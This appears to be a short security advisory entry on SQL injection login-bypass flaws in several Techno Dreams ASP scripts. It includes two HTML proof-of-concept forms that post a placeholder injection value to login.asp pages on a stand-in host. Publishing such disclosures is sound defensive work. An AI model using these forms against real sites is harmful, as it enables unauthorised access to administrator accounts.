|
Techno Dreams Multiple Scripts Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof of concepts are available: <html> <h1>Techno Dreams Announcement - Guestbook - WebDirectory Script Login-Bypass PoC - Kapda `s advisory </h1> <p> Discovery and exploit by farhadkey [at} kapda.ir</p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <form method="POST" action="http://www.example.com/admin/login.asp"> <input type="hidden" name="userid" value="[SQL Injection]"> <input type="hidden" name="passwd" value="1"> <input type="submit" value="Submit" name="submit"> </form></html> <html> <h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s advisory </h1> <p> Discovery and exploit by farhadkey [at} kapda.ir</p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <form method="POST" action="http://www.example.com/login.asp"> <input type="hidden" name="userid" value="[SQL Injection}"> <input type="hidden" name="passwd" value="1"> <input type="submit" value="Submit" name="submit"> </form></html> |
|
|
Privacy Statement |